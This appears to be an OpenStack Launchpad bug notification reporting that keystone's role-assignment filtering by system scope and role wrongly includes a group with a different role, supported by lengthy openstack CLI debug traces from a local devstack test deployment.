ListRoleAssignment: END return value: 0 ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1846817 Title: v3/role_assignments filtering exposes unnecessary role assignments Status in OpenStack Identity (keystone): New Status in OpenStack Security Advisory: Won't Fix Bug description: I have a deployment that exercises multiple system role assignments:  - An "operator" user has the "admin" role on the system  - A "system-support" user has the "member" role on the system  - A "system-admins" group has the "reader" role on the system If I ask keystone to filter a list of role assignments by --system all and --role member, I should only see a list with the "system-support" user and the "operator" user. Instead, I get a list with three entries that includes the group, which doesn't have the member role at all, it only has reader. Depending on how you classify this, it could leak information to clients. Groups don't appear to be filtered from the list since "reader" doesn't imply "member" (it's the other way around). 
$ openstack role assignment list --names --system all --debug START with options: role assignment list --names --system all --debug options: Namespace(access_key='', access_secret='***', access_token='***', access_token_endpoint='', access_token_type='', application_credential_id='', application_credential_name='', application_credential_secret='***', auth_methods='', auth_type='', auth_url='', cacert=None, cert='', client_id='', client_secret='***', cloud='devstack-system-admin', code='', consumer_key='', consumer_secret='***', debug=True, default_domain='default', default_domain_id='', default_domain_name='', deferred_help=False, discovery_endpoint='', domain_id='', domain_name='', endpoint='', identity_provider='', identity_provider_url='', insecure=None, interface='public', key='', log_file=None, openid_scope='', os_beta_command=False, os_compute_api_version='', os_identity_api_version='', os_image_api_version='', os_key_manager_api_version='1', os_network_api_version='', os_object_api_version='', os_project_id=None, os_project_name=None, os_volume_api_version='', passcode='', password='***', profile='', project_domain_id='', project_domain_name='', project_id='', project_name='', protocol='', redirect_uri='', region_name='', remote_project_domain_id='', remote_project_domain_name='', remote_project_id='', remote_project_name='', service_provider='', service_provider_endpoint='', service_provider_entity_id='', system_scope='', timing=False, token='***', trust_id='', url='', user_domain_id='', user_domain_name='', user_id='', username='', verbose_level=3, verify=None) Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} defaults: {u'auth_type': 'password', u'status': u'active', u'image_status_code_retries': 5, u'baremetal_introspection_status_code_retries': 5, 'api_timeout': None, 'cacert': None, u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, u'interface': u'public', u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', u'baremetal_status_code_retries': 5, 'verify': True, 'cert': None, u'secgroup_source': u'neutron', u'object_store_api_version': u'1', u'disable_vendor_agent': {}} cloud cfg: {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', 
u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} compute API version 2.1, cmd group openstack.compute.v2 network API version 2, cmd group openstack.network.v2 image API version 2, cmd group openstack.image.v2 volume API version 3, cmd group openstack.volume.v3 identity API version 3, cmd group openstack.identity.v3 object_store API version 1, cmd group openstack.object_store.v1 key_manager API version 1, cmd group openstack.key_manager.v1 Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} command: role assignment list -> openstackclient.identity.v3.role_assignment.ListRoleAssignment (auth=True) Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'timing': False, 'additional_user_agent': [('osc-lib', '1.13.0')], u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, 
u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, u'interface': 'public', 'cacert': None, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'disable_vendor_agent': {}} Using auth plugin: password Using parameters {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'} Get auth_ref REQ: curl -g -i -X GET http://10.0.3.122/identity -H "Accept: application/json" -H "User-Agent: openstacksdk/0.34.0 keystoneauth1/3.17.0 python-requests/2.22.0 CPython/2.7.15+" Starting new HTTP connection (1): 10.0.3.122:80 http://10.0.3.122:80 "GET /identity HTTP/1.1" 300 269 RESP: [300] Connection: close Content-Length: 269 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:29 GMT Location: http://10.0.3.122/identity/v3/ Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-f35dcb91-9d9f-4c85-9421-1600e6a6ec27 RESP BODY: {"versions": {"values": [{"status": "stable", "updated": "2019-07-19T00:00:00Z", "media-types": [{"base": "application/json", "type": "application/vnd.openstack.identity-v3+json"}], "id": "v3.13", "links": [{"href": "http://10.0.3.122/identity/v3/", "rel": "self"}]}]}} GET call to http://10.0.3.122/identity used request id req-f35dcb91-9d9f-4c85-9421-1600e6a6ec27 Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": [{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "system": {"all": true}, "expires_at": "2019-10-04T19:56:29.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45"}], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "keystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["JVQCRxBoTUyzm2CqiCoj6w"], "issued_at": "2019-10-04T18:56:29.000000Z"}} run(Namespace(authproject=False, authuser=False, columns=[], domain=None, effective=False, fit_width=False, formatter='table', group=None, group_domain=None, inherited=False, max_width=0, names=True, noindent=False, print_empty=False, project=None, project_domain=None, 
quote_mode='nonnumeric', role=None, role_domain=None, sort_columns=[], system=u'all', user=None, user_domain=None)) Instantiating identity client: Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": [{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "system": {"all": true}, "expires_at": "2019-10-04T19:56:29.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45"}], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "keystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["U9Z3md9YTP-9-bTLuPDIzg"], "issued_at": "2019-10-04T18:56:29.000000Z"}} REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/role_assignments?scope.system=all&include_names=True -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: {SHA256}042443671367aa0183e15fd2692bf4c70d15050bdac46db883fd836440ae1065" Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "GET /identity/v3/role_assignments?scope.system=all&include_names=True HTTP/1.1" 200 2401 RESP: [200] Connection: close Content-Length: 2401 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:29 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-c9bf133b-7ec4-49a5-b9da-3185dc6c55d2 RESP BODY: {"role_assignments": [{"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, "group": {"domain": {"id": "default", "name": "Default"}, "id": "c814cd4739bd4960ad08ade3814f1560", "name": "system-admins"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/groups/c814cd4739bd4960ad08ade3814f1560/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}, "group": {"domain": {"id": "default", "name": "Default"}, "id": "dd97034049fd46a6bdb33a32f1c7759e", "name": "system-auditors"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/groups/dd97034049fd46a6bdb33a32f1c7759e/roles/7ee093f4ccf345bba963ce765f9b797f"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "0ec0eb48c66d4fb79c432a2ff8c5d257", "name": "admin"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/0ec0eb48c66d4fb79c432a2ff8c5d257/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "0f75914e63cb46e795cae7e6facd0ecb", "name": 
"operator"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/0f75914e63cb46e795cae7e6facd0ecb/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "66256692b6b942a8814ffd87d32a3963", "name": "system-support"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/66256692b6b942a8814ffd87d32a3963/roles/a8cd98f2e98d4135b2fa83950d6171ec"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "e8fec49e15984aedb5e1235f279434fe", "name": "auditor"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/e8fec49e15984aedb5e1235f279434fe/roles/7ee093f4ccf345bba963ce765f9b797f"}}], "links": {"self": "http://10.0.3.122/identity/v3/role_assignments?scope.system=all&include_names=True", "previous": null, "next": null}} GET call to identity for http://10.0.3.122/identity/v3/role_assignments?scope.system=all&include_names=True used request id req-c9bf133b-7ec4-49a5-b9da-3185dc6c55d2 +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | Role | User | Group | Project | Domain | System | Inherited | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | admin | | system-admins at Default | | | all | False | | reader | | system-auditors at Default | | | all | False | | admin | admin at Default | | | | all | False | | admin | operator at Default | | | | all | False | | member | system-support at Default | | | | all | False | | reader | auditor at Default | | | | all | False | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ clean_up ListRoleAssignment: END return value: 0 The Trace above lists all system role assignments to confirm my setup locally. The following trace shows that the group is returned with the wrong role assignment based on the filter. 
$ openstack role assignment list --names --system all --role member --debug [1/880] START with options: role assignment list --names --system all --role member --debug options: Namespace(access_key='', access_secret='***', access_token='***', access_token_endpoint='', access_token_type='', application_credential_id='', application_credential_name='', application_credential_secret='***', auth_methods='',  auth_type='', auth_url='', cacert=None, cert='', client_id='', client_secret='***', cloud='devstack-system-admin', code='', consumer_key='', consumer_secret='***', debug=True, default_domain='default', default_domain_id='', default_domai n_name='', deferred_help=False, discovery_endpoint='', domain_id='', domain_name='', endpoint='', identity_provider='', identity_provider_url='', insecure=None, interface='public', key='', log_file=None, openid_scope='', os_beta_command=F alse, os_compute_api_version='', os_identity_api_version='', os_image_api_version='', os_key_manager_api_version='1', os_network_api_version='', os_object_api_version='', os_project_id=None, os_project_name=None, os_volume_api_version='',  passcode='', password='***', profile='', project_domain_id='', project_domain_name='', project_id='', project_name='', protocol='', redirect_uri='', region_name='', remote_project_domain_id='', remote_project_domain_name='', remote_proje ct_id='', remote_project_name='', service_provider='', service_provider_endpoint='', service_provider_entity_id='', system_scope='', timing=False, token='***', trust_id='', url='', user_domain_id='', user_domain_name='', user_id='', usern ame='', verbose_level=3, verify=None) Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-ad min', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system _scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key ': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} defaults: {u'auth_type': 'password', u'status': u'active', u'image_status_code_retries': 5, u'baremetal_introspection_status_code_retries': 5, 'api_timeout': None, 'cacert': None, u'image_api_use_tasks': False, u'floating_ip_source': u'ne utron', 'key': None, u'interface': u'public', u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', u'baremetal_status_code_retries': 5, 'verify': True, 'cert': None, u'secgroup_source': u'neutron', u'object_store_api_ version': u'1', u'disable_vendor_agent': {}} cloud cfg: {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 've rify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 
'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interfa ce': 'public', u'disable_vendor_agent': {}} compute API version 2.1, cmd group openstack.compute.v2 network API version 2, cmd group openstack.network.v2 image API version 2, cmd group openstack.image.v2 volume API version 3, cmd group openstack.volume.v3 identity API version 3, cmd group openstack.identity.v3 object_store API version 1, cmd group openstack.object_store.v1 key_manager API version 1, cmd group openstack.key_manager.v1 Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-ad min', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system _scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key ': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-ad min', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system _scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key ': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} command: role assignment list -> openstackclient.identity.v3.role_assignment.ListRoleAssignment (auth=True) Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'timing': False, 'additional_user_agent': [('osc-lib', '1.13.0')], u'network_api_version': u'2', u'message': u'', u'image_format': u'q cow2', 'networks': [], 'cloud': 
'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_ti meout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tas ks': False, u'floating_ip_source': u'neutron', 'key': None, u'interface': 'public', 'cacert': None, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_h elp': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'disable_vendor_agent': {}} Using auth plugin: password Using parameters {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'} Get auth_ref REQ: curl -g -i -X GET http://10.0.3.122/identity -H "Accept: application/json" -H "User-Agent: openstacksdk/0.34.0 keystoneauth1/3.17.0 python-requests/2.22.0 CPython/2.7.15+" Starting new HTTP connection (1): 10.0.3.122:80 http://10.0.3.122:80 "GET /identity HTTP/1.1" 300 269 RESP: [300] Connection: close Content-Length: 269 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:49 GMT Location: http://10.0.3.122/identity/v3/ Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-d5 784d4c-7b47-4647-b912-65e6a78b835e RESP BODY: {"versions": {"values": [{"status": "stable", "updated": "2019-07-19T00:00:00Z", "media-types": [{"base": "application/json", "type": "application/vnd.openstack.identity-v3+json"}], "id": "v3.13", "links": [{"href": "http://10. 
0.3.122/identity/v3/", "rel": "self"}]}]}} GET call to http://10.0.3.122/identity used request id req-d5784d4c-7b47-4647-b912-65e6a78b835e Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": [{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "syste m": {"all": true}, "expires_at": "2019-10-04T19:56:49.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45" }], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321 893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "ke ystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["SGRaWT8BTVuzELGwxqjBdg"], "issued_at": "2019-10-04T18:56:49.000000 Z"}} run(Namespace(authproject=False, authuser=False, columns=[], domain=None, effective=False, fit_width=False, formatter='table', group=None, group_domain=None, inherited=False, max_width=0, names=True, noindent=False, print_empty=False, pro ject=None, project_domain=None, quote_mode='nonnumeric', role=u'member', role_domain=None, sort_columns=[], system=u'all', user=None, user_domain=None)) Instantiating identity client: Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": [{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "syste m": {"all": true}, "expires_at": "2019-10-04T19:56:50.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45" }], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321 893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "ke ystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["2nu0u-1wQRmWA9_uS2hZ-g"], "issued_at": "2019-10-04T18:56:50.000000 Z"}} REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/roles/member -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: 
{SHA256}cb5bcba8735c5a7ea6f80ea414ee306e1a0b6a9c0c39c4dbf1296a96f6516ab6"
Resetting dropped connection: 10.0.3.122
http://10.0.3.122:80 "GET /identity/v3/roles/member HTTP/1.1" 404 84
RESP: [404] Connection: close Content-Length: 84 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:50 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-88bce424-60f2-4d2a-a6f5-2bd256602789
RESP BODY: {"error":{"code":404,"message":"Could not find role: member.","title":"Not Found"}}
GET call to identity for http://10.0.3.122/identity/v3/roles/member used request id req-88bce424-60f2-4d2a-a6f5-2bd256602789
Request returned failure status: 404
REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/roles?name=member -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: {SHA256}cb5bcba8735c5a7ea6f80ea414ee306e1a0b6a9c0c39c4dbf1296a96f6516ab6"
Resetting dropped connection: 10.0.3.122
http://10.0.3.122:80 "GET /identity/v3/roles?name=member HTTP/1.1" 200 322
RESP: [200] Connection: close Content-Length: 322 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:50 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-ce429b68-b53d-4c49-9080-ed3da3bce55b
RESP BODY: {"links": {"self": "http://10.0.3.122/identity/v3/roles?name=member", "previous": null, "next": null}, "roles": [{"description": null, "links": {"self": "http://10.0.3.122/identity/v3/roles/a8cd98f2e98d4135b2fa83950d6171ec"}, "options": {}, "id": "a8cd98f2e98d4135b2fa83950d6171ec", "domain_id": null, "name": "member"}]}
GET call to identity for http://10.0.3.122/identity/v3/roles?name=member used request id req-ce429b68-b53d-4c49-9080-ed3da3bce55b
REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: {SHA256}cb5bcba8735c5a7ea6f80ea414ee306e1a0b6a9c0c39c4dbf1296a96f6516ab6"
Resetting dropped connection: 10.0.3.122
http://10.0.3.122:80 "GET /identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True HTTP/1.1" 200 1328
RESP: [200] Connection: close Content-Length: 1328 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:50 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-08f9bdb9-149d-4905-96cc-99b87c8b6339
